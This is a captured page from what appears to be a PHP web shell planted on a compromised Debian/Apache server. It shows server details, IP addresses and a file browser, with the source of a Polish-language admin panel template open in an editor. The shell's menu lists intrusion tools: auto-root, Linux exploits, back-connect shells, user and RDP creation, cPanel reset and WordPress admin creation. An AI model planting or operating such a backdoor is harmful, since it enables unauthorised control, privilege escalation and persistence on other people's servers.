Linux polon 4.19.0-27-amd64 #1 SMP Debian 4.19.316-1 (2024-06-25) x86_64
Apache/2.4.59 (Debian)
: 10.2.73.233 | : 3.149.25.26
Cant Read [ /etc/named.conf ]
5.6.40-64+0~20230107.71+debian10~1.gbp673146
www-data
www.github.com/MadExploits
Terminal
AUTO ROOT
Adminer
Backdoor Destroyer
Linux Exploit
Lock Shell
Lock File
Create User
CREATE RDP
PHP Mailer
BACKCONNECT
UNLOCK SHELL
HASH IDENTIFIER
CPANEL RESET
CREATE WP USER
README
+ Create Folder
+ Create File
/
home /
ifk /
web /
protected /
Layouts /
[ HOME SHELL ]
Name
Size
Permission
Action
AdminLayout.php
1.87
KB
-rw-r--r--
AdminLayout.tpl
3.6
KB
-rw-r--r--
LoginLayout.php
954
B
-rw-r--r--
LoginLayout.tpl
3.37
KB
-rw-r--r--
MainLayout.php
5.07
KB
-rw-r--r--
MainLayout.tpl
19.8
KB
-rw-r--r--
Delete
Unzip
Zip
${this.title}
Close
Code Editor : AdminLayout.tpl
<!DOCTYPE html> <html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" > <com:THead Title="Panel Administracyjny"> <com:TMetaTag HttpEquiv="Content-Type" Content="text/html; charset=utf-8" /> <link rel="shortcut icon" type="image/x-icon" href="themes/front/gfx/favicon.ico"> </com:THead> <body> <com:TForm> <input type="hidden" name="MAX_FILE_SIZE" id="MAX_FILE_SIZE" value="10485760" /> <div id="container"> <div id="header"> <div style="float:right"><br/><com:TButton Text="Wyloguj" ValidationGroup="logout" onClick="adminLogout" Visible="<%= !$this->User->isGuest %>"/></div> </div> <com:TPanel Id="Menu1" CssClass="menu" Visible="<%= $this->User->getRole() == 0 %>"><br/> <a href="<%= $this->Service->constructUrl('Admin.UserEdit', array('uid'=>$this->User->id)) %>">Mój profil</a> <a href="<%= $this->Service->constructUrl('Admin.UserBrowse') %>">Lista użytkowników</a> <a href="<%= $this->Service->constructUrl('Admin.UserPapers', array('uid'=>-1)) %>">Wszystkie publikacje</a> <a href="<%= $this->Service->constructUrl('Admin.NewsItems') %>">Aktualności</a> <a href="<%= $this->Service->constructUrl('Admin.ContentBrowse') %>">Zawartość tekstowa</a> <a href="<%= $this->Service->constructUrl('Admin.ClassCatalog') %>">Katalog zajęć</a> <a href="<%= $this->Service->constructUrl('Admin.ClassSchedule') %>">Plany zajęć</a> <a href="<%= $this->Service->constructUrl('Admin.RightBoxesList') %>">Kafelki</a> <a href="<%= $this->Service->constructUrl('Admin.PasswordChange', array('uid'=>$this->User->id)) %>">Zmień swoje hasło</a> <br/> </com:TPanel> <com:TPanel Id="Menu2" CssClass="menu" Visible="<%= $this->User->getRole() == 2 %>"><br/> <a href="<%= $this->Service->constructUrl('Admin.UserEdit', array('uid'=>$this->User->id)) %>">Mój profil</a> <a href="<%= $this->Service->constructUrl('Admin.PasswordChange', array('uid'=>$this->User->id)) %>">Zmień swoje hasło</a> <br/> </com:TPanel> <div id="body"> <com:TActivePanel ID="statusPanel" > <com:TPanel ID="successPanel" Style.CSSClass='statusPanel_success' Visible="false" EnableViewState="false"> <com:TLiteral ID="successMessage"/> <com:TClientScript> function fadeout(){ new Effect.Opacity("<%= $this->successPanel->getClientID()%>", {duration:3.0, from:1.0, to:0.0}); } Event.observe(window, 'load', function() { var fade=setTimeout("fadeout()",3000); }); </com:TClientScript> </com:TPanel> <com:TPanel ID="errorPanel" Style.CSSClass='statusPanel_error' Visible="false" EnableViewState="false"> <com:TLiteral ID="errorMessage"/> </com:TPanel> <com:TPanel ID="warningPanel" Style.CSSClass='statusPanel_warning' Visible="false" EnableViewState="false"> <com:TLiteral ID="warningMessage"/> <com:TClientScript> function fadeout(){ new Effect.Opacity("<%= $this->warningPanel->getClientID()%>", {duration:3.0, from:1.0, to:0.0}); } Event.observe(window, 'load', function() { var fade=setTimeout("fadeout()",3000); }); </com:TClientScript> </com:TPanel> <com:TPanel ID="infoPanel" Style.CSSClass='statusPanel_info' Visible="false" EnableViewState="false"> <com:TLiteral ID="infoMessage"/> <com:TClientScript> function fadeout(){ new Effect.Opacity("<%= $this->infoPanel->getClientID()%>", {duration:3.0, from:1.0, to:0.0}); } Event.observe(window, 'load', function() { var fade=setTimeout("fadeout()",3000); }); </com:TClientScript> </com:TPanel> </com:TActivePanel> <com:TContentPlaceHolder ID="content"/> <br clear="both"/> </div> </div> </com:TForm> </body> </html>
Close